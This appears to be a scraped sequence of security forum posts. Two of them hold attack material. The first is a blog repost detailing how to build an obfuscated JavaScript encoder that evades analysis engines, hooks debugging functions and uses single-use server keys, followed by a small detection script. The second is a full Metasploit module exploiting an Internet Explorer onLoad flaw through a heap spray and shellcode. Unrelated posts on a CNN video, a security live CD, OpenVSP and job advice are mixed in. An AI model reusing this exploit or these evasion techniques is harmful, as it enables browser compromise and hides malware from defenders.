This post won't cover the creation of the encoder as that in itself could take a couple of posts alone. Instead, focus will be placed on some of the techniques I used and how the overall output product is generated. Comparisons will also be done between my output and what is currently being seen in the wild.

Routines

The routines used in my encoder are similar to what has already been put out by attackers, but with some more technical aspects to ensure the code is not easily reversed. The following describes the flow of transformation:

1. Code to be encoded is taken in
2. Encoder sets and splits are generated to be used later in the routines
3. Code is run through a function that converts ASCII to its number form
4. Each number is then mapped to a random alpha key resulting in a single character
5. Each character is mapped against the encoder set which results in a long string made up of 3 unique characters
6. Alpha key is stored server side and mapped to a seed token
7. Round one decryption routine is built taking all variables listed above into account (additional data for round two decryption routine is stored local to the class)
8. Output generated from routine one is fed to routine two
9. Steps 1-5 are run again
10. Round two decryption routine is built taking pieces of data from round one

Output Code and Results

The output code is large, so here is a screenshot capturing the bulk portion of the code:

As you can see, it clearly looks like something malicious is happening here, but without reversing you are left guessing what exploit could be used in the delivery. If you want a live example, visit here and if you just want the output sample then see here. After running my code through Wepawet and Jsunpack a few times, I was able to tune the script such that it would be flagged as benign. This is mostly due to the fact that jQuery is required to fully decode the payload and neither of these engines seem to account for that. In the example I decided not to output the original code that I fed to the encoder, so if you want to have a shot at reversing it, go ahead and email your answer. There won't be any prizes for solving the puzzle, but it could be good practice.

Variable Names

Almost all obfuscated JS makes a point of creating random variable names. At first glance it is difficult to identify what is going on, but after doing several finds and replaces, you have a pretty good idea where to hook so you get the output result. Instead of doing a 100% random sequence, I opted for something a bit more annoying. All my variable names are derived off a single string of one letter that has randomly been camel cased. Each variable is essentially carved from the core string at random lengths and offsets. This results in variable names that are sometimes contained within other variable names. To illustrate what I mean, take a look at this example:

As you can see, no longer can you simply find and replace every instance of a variable. In fact, you can almost never do that with any one variable without first checking where else it occurs. Not only is this effective in making the code difficult to read, but it also still retains the same effect that existing code achieves.

Invisible Payloads

Within the ASCII character set are numerous characters that print as blanks. Unfortunately, only four of these characters are printable in a web environment. These characters are spaces, horizontal tabs, vertical tabs and new pages. It is ideal to have one of these four characters serve as a spacer, as it makes it possible to identify where separation begins and ends in the encoded output. This leaves three characters left that can be used to encode our input code. Fortunately, if we do not take case into account, then we have 3 to the 9th power combinations (27) allowing us to represent the entire lowercase alphabet in invisible characters (this process is used in step 5 of the flow). Initially all encoded output code was done using the three letters, but that resulted in the same pattern every time. At first this would be a pain to reverse, but once you knew what you were dealing with, it wouldn't be hard at all. To combat against this issue, I decided to randomly select the spacer from the four values, and included the remaining three in an array of "encoding characters". The output of this would sometimes result in a 100% visible encoded output, but other times it results in half-way visible or three-quarters visible output, making it difficult to identify which invisible character is being used for what. Below is a small portion of the output code after being encoded:

Preemptive Hooks

I wrote about JavaScript Hookers a few weeks ago and it dawned on me that these did not exist in malicious output. If I were hooking certain functions to reverse a payload, then why couldn't an attacker do the same? Following the same concept as a reverse engineer, I hooked "eval", "alert" and reassigned "console" and "document" before clobbering them. Essentially what this means is that if you try and use "console.log" or "alert" when reversing this code, it will send you into an infinite loop. Also, because I reassign certain functionality to random variables, you need to also keep those preserved, otherwise you will break the code later when they get used. To combat against this you would need to inject JS after my hooks and redefine the functions back to their original state. I am not certain how this would be done, but in the event someone managed to do it, I decided to throw in another problem. Some hooks are defined in one round and then later used in the second round decoder, meaning you can't just redefine everything back to how it was. Furthermore, on the second round, I clobber all global functions listed above again, therefore forcing the user to inject another override.

AJAX Required

As part of the decoding routine, AJAX is used to pass data back to the server to get the proper return value. This is based on the alpha key generated and stored during the encoding process. Since this key is random, you are out of luck if you don't have access to the server, unless of course you want to brute force the values. The AJAX portion of the encoding is only present in round two of the decoding routine, so at first glance, there is no mention of any AJAX. If you copy and paste the script into a reversing environment, you will be able to decode the first round without issue, but the second round will leave you stuck. The nature of AJAX forces you to hardcode a URL that is within the same domain as your hosted code. This is not really an issue as we can control this value server-side, but to pull the correct alpha key, we need to pass a unique seed token. Someone reversing the code could copy the URL and parameters to just get the values and subvert the whole process. To combat against this, the amount of iterations is calculated and stored with the seed token and alpha key mapping. This means that the payload is literally only good to run one time and one time only. After the sequence has run and talked with the server for its set call limit, it starts spewing random values, causing the decoding to fail.

Exception Clauses

Try/except clauses have been known to cause problems for automated analysis engines, but that has been fixed to some extent. For the AJAX portion of the code above to work, I include jQuery (it is small and ubiquitous), which means it uses its own syntax for certain actions. Analysis engines are currently not smart enough to include these libraries and as a result, we can use this against them in our try/except clauses. If we wrap our entire code base and routines in try/except clauses where the try attempts to do something with jQuery, then we know the engine will fail and therefore hit the exception catch. This simple, yet effective technique is used in both rounds of the decoding process. It should be noted that in some cases the catch portion of the code returns actual data that can be used within the overall decoding process. This means that the code won't break or cease to function just because the exception is hit. In other words, a good exception is not wasted and instead is used to throw the analyst off. If you are not careful, you could easily miss the fact that the catch is caught in the round two decryption, resulting in random characters being generated for the output string.

Encoded Code/Shellcode Detour

One of the less technical or amusing pieces of the code is what I call the "detour data". This is just essentially random code made to look interesting so the user spends time saving, reversing or trying to make sense of it. There is nothing stopping it from getting used later on, but for now it is not and just takes up space. Since it is random, it too changes, giving it the appearance of being useful.

Comment Bombs

When reversing obfuscated JS, it is normal to remove it from the live environment and throw it into a safe place where it can be run. The first tool that comes to mind for dealing with this sort of problem is Malzilla. It does a great job making ugly code readable and assisting in the process of reversing. Unfortunately the code used to "beautify" the JS is flawed to some extent. If I throw in some specially made comments, when you hit the cleanup, it completely sprays the comment data into the code, therefore breaking it. This is by no means advanced or technical, but can be confusing if done near a single instruction if/else statement.

Tailored Output

The code currently generated by the encoder does not account for the browser version being used. Keep in mind that if you know the browser or have a reasonable idea of what version it is, then there are certain things you can do to make life hell or tailor your output code to make it less bulky. As an example, think of Firefox and the Firebug extension. Firebug is great, almost too great for doing live analysis or code changes. If we can detect the presence of Firebug being on, then why not kill ourselves to avoid being analyzed. The current output will not kill itself if it senses Firebug, but it will clear the console to avoid all the AJAX calls from being seen. This is just a small example, but it helps illustrate what more could be done.

Future Improvements

One and Done

Following the same trend on limiting AJAX calls, there is nothing stopping an attacker from generating a random directory to hold a randomly named JS file that deletes itself after being run once. Imagine a user gets compromised and you now want to look to see what was used, only to find that the file no longer exists on the server and the payload is useless without the proper decoding handler. I have toyed around with this, but do not intend on sharing it at this time.

Secure Chatting

HTTP GET requests are used when making the AJAX call back to the server. This could easily be changed to HTTPS POST requests, therefore hiding what was sent and killing any hope of successfully understanding what was going on between the client and server. Enabling such a setup is as simple as changing the web server configuration and the AJAX call within the code.

Conclusions

Once again, this example goes to show that attackers can do a lot more to make life hell. The fact that they don't is a huge relief to us, but given we are already starting to see AJAX used to fetch shellcode, I can say with certainty that these sorts of techniques and more are going to show up in malicious code soon. If we start working against them now, it will be easier when they are being used for evil. At this point in time I am not releasing the encoder as that would spoil the challenge if someone wanted to accept it, but if you are interested in knowing more or discussing the process, email me.

Sursa: Obfuscated JavaScript 2.0 - Building an encoder - 9b+
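The "Invisible Payloads" and "Preemptive Hooks" sections each describe something an analyst can check for mechanically before spending time on a sample: a script body dense with tab, vertical-tab and form-feed characters, and assignments that clobber built-ins such as alert or eval. The triage script below is an added example for this page, not the author's encoder (which was not released) nor any code from the post; the two input snippets are constructed, and the thresholds are assumptions to be tuned against your own corpus.

```python
import re

# Whitespace characters the post names as "invisible" besides the plain space.
INVISIBLE = {"\t": "TAB", "\x0b": "VT", "\x0c": "FF"}
INVISIBLE_RUN = re.compile(r"[\t\x0b\x0c]+")

# Globals the post describes as hooked or clobbered before the real decoder runs.
# Matches "name = ..." (including "window.alert = ...") but not "name == ...".
CLOBBER = re.compile(r"\b(eval|alert|console|document)\s*=(?!=)")


def invisible_stats(source):
    """Count each invisible character, their share of the text and the longest
    contiguous run. Ordinary code carries tabs only as short indentation runs."""
    counts = {name: source.count(ch) for ch, name in INVISIBLE.items()}
    total_invisible = sum(counts.values())
    longest = max((len(m.group(0)) for m in INVISIBLE_RUN.finditer(source)), default=0)
    ratio = total_invisible / len(source) if source else 0.0
    return {"counts": counts, "ratio": ratio, "longest_run": longest}


def clobbered_globals(source):
    """Built-in names the script assigns to, e.g. 'alert = function(){...}'."""
    return sorted(set(CLOBBER.findall(source)))


def triage(source, min_ratio=0.2, min_run=16):
    """Return findings for one script body. 'suspicious' is True when either
    heuristic fires. The thresholds are demo assumptions, not from the post."""
    stats = invisible_stats(source)
    rare = stats["counts"]["VT"] + stats["counts"]["FF"]   # VT/FF never appear in normal code
    encoded = stats["ratio"] >= min_ratio or (stats["longest_run"] >= min_run and rare > 0)
    hooks = clobbered_globals(source)
    return {
        "invisible": stats,
        "encoded_payload": encoded,
        "clobbered": hooks,
        "suspicious": encoded or bool(hooks),
    }


# Constructed samples: a normal tab-indented function, and a script that clobbers
# alert/eval and carries a string literal packed with a TAB/VT/FF alphabet.
BENIGN = "function add(a, b) {\n\treturn a + b;\n}\n"
ENCODED = ("window.alert = function(){ while(1){} };\n"
           "eval = function(){};\n"
           "var p = '" + "\t\x0b\x0c\x0b\t\x0c" * 10 + "';\n")


if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("encoded", ENCODED)):
        print(label, triage(src))
```

The ratio test catches the "100% invisible" output the post describes, while the longest-run test combined with the presence of VT or FF catches the partly visible variants, since those characters have no place in hand-written source; the clobber check is cheap enough to run over every script before loading it into an analysis environment where alert or console.log is about to be hooked.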
-
[h=1]CNN Inside Anonymous[/h]

http://www.youtube.com/watch?v=NDhEHkqGbxA

Uploaded by LegionIsUnity on Jan 14, 2012

CNN reporter Amber Lyon (twitter: @AmberLyon) takes an inside look at the hactivist group "Anonymous". Original air date: Jan 14, 2012

==================================================

Download: CNN Inside Anonymous.wmv

Bla bla...
-
Yes, I quite often see Linux on 64 MB flash chips with ARM processors.
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed open source network security applications and should run on most x86/x86_64 platforms.

The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of open source network security tools. The majority of the tools published in the article Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live CD are: Ntop, Wireshark, Nmap with the visualization tool Zenmap, and Kismet.

Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are Nmap with the visualization tool Zenmap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management.

You can read some of my articles about Nmap and Ntop by following the links; for Nmap you also get Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

Nagios and Argus are also available on NST, two pieces of software that can be used for network monitoring: you can check the status of various services, like a web server, a POP/IMAP mail server or other services that in general you can test directly with a network connection.

Another nice, and really “scenic”, feature is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool, nstgeolocate, which geolocates hosts obtained from an ‘ntop’ session or geolocates IPv4 address conversations from a network packet capture file on a Mercator world map projection or global imagery.

There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages.

A great guide on what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions

This live CD is really filled with security tools and utilities, so it could be really useful to set up in a few minutes a location where you can do a security audit of a network or some hosts. The option to put it on a virtual machine is also really interesting; on the wiki there is a good how-to on putting NST on VirtualBox.

So in a few words: try and use it for your security audit, you’ll be satisfied for sure.

Sursa: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en
-
Exploiting embedded systems

Overview:
- Embedded systems basics
- Real Time OS
- The ARM architecture
- The JTAG interface
- The UART interface
..............................

Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf

It is a presentation, but the concepts can be seen from it.
-
Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
      'Description'    => %q{
          This bug is triggered when the browser handles a JavaScript 'onLoad'
        handler in conjunction with an improperly initialized 'window()' JavaScript
        function. This exploit results in a call to an address lower than the heap.
        The javascript prompt() places our shellcode near where the call operand
        points to. We call prompt() multiple times in separate iframes to place our
        return address. We hide the prompts in a popup window behind the main window.
        We spray the heap a second time with our shellcode and point the return
        address to the heap. I use a fairly high address to make this exploit more
        reliable. IE will crash when the exploit completes. Also, please note that
        Internet Explorer must allow popups in order to continue exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Benjamin Tobias Franz', # Discovery
          'Stuart Pearson',        # Proof of Concept
          'Sam Sharps'             # Metasploit port
        ],
      'References'     =>
        [
          ['MSB', 'MS05-054'],
          ['CVE', '2005-1790'],
          ['OSVDB', '17094'],
          ['URL', 'http://www.securityfocus.com/bid/13799/info'],
          ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'             => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00",
          'Compat'          =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
          [ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
        ],
      'DisclosureDate' => 'Nov 21 2005',
      'DefaultTarget'  => 0))
  end

  def exploit
    # Random marker appended to the iframe URLs so the second request
    # can be told apart from the first (see on_request_uri).
    @var_redir = rand_text_alpha(rand(100)+1)
    super
  end

  # Pick the target from the User-Agent header; returns nil when the
  # browser/OS combination is not one of the two supported targets.
  def auto_target(cli, request)
    mytarget = nil
    agent = request.headers['User-Agent']
    print_status("Checking user agent: #{agent}")

    if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
      mytarget = targets[0] # IE6 on XP
    elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
      mytarget = targets[1] # IE6 on 2000
    else
      print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    mytarget
  end

  def on_request_uri(cli, request)
    mytarget = auto_target(cli, request)

    # Unsupported client: answer 404 instead of dereferencing a nil target
    # below in mytarget['iframes'].
    if mytarget.nil?
      send_not_found(cli)
      return
    end

    var_title = rand_text_alpha(rand(100) + 1)
    func_main = rand_text_alpha(rand(100) + 1)

    heapspray = ::Rex::Exploitation::JSObfu.new %Q|
      function heapspray() {
        shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
        var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
        var headersize = 20;
        var slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) bigblock += bigblock;
        var fillblock = bigblock.substring(0,slackspace);
        var block = bigblock.substring(0,bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) block = block + block + fillblock;
        var memory = new Array();
        for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
        var ret = "";
        var fillmem = "";
        for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F");
        for (i = 0; i < 200; i++) fillmem += ret;
        prompt(fillmem, "");
      }
    |
    heapspray.obfuscate

    nofunc = ::Rex::Exploitation::JSObfu.new %Q|
      if (document.location.href.indexOf("#{@var_redir}") == -1) {
        var counter = 0;
        top.consoleRef = open('','BlankWindow',
          'width=100,height=100'
          +',menubar=0'
          +',toolbar=1'
          +',status=0'
          +',scrollbars=0'
          +',left=1'
          +',top=1'
          +',resizable=1')
        self.focus()
        for (counter = 0; counter < #{mytarget['iframes']}; counter++) {
          top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}></iframe>');
        }
        document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
      } else {
        #{heapspray.sym('heapspray')}();
      }
    |
    nofunc.obfuscate

    main = %Q|
      function #{func_main}() {
        document.write("<TITLE>#{var_title}</TITLE>");
        document.write("<body onload=window();>");
        window.location.reload();
      }
    |

    html = %Q|
      <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
      <html>
      <head>
      <meta http-equiv="Content-Language" content="en-gb">
      <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
      <script>
      #{nofunc}
      #{heapspray}
      #{main}
      </script>
      </head>
      <body>
      </body>
      </html>
    |

    print_status("Sending #{self.name} to client #{cli.peerhost}")

    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

    # Handle the payload
    handler(cli)
  end

end

Source: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
-
[h=1]OpenVSP[/h]

NASA Open Source Parametric Geometry

OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990s. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below.

OpenVSP 2.0 for Windows
OpenVSP 2.0 for Mac OS X
OpenVSP 2.0 Community Edition Source Code

Interesting idea. And what "ugly" source code:

lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1);
xo = xt[0];
xl[0] = xt[199];
tr = ym * 2.f / (xl[0] - xo);
rat = toc / tr;
sf = rat;
if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) {
    goto L400;
}

Source: OpenVSP
-
If you are good, the field doesn't matter, you will find work. It's harder at the beginning, but little by little you will find something nice, that you like and that brings you substantial income. On the PHP side there is demand, but there are many people and you have to be good; Java is still in demand, but I don't know for how much longer it will be; there aren't very many administrator positions, but I think they pay well; and C++, I think, will always be in demand. Look on bestjobs/ejobs at what is in demand, search by the required experience and see what criteria are required for each. You'll "lose" two days on this, but afterwards you will know exactly what you have to do.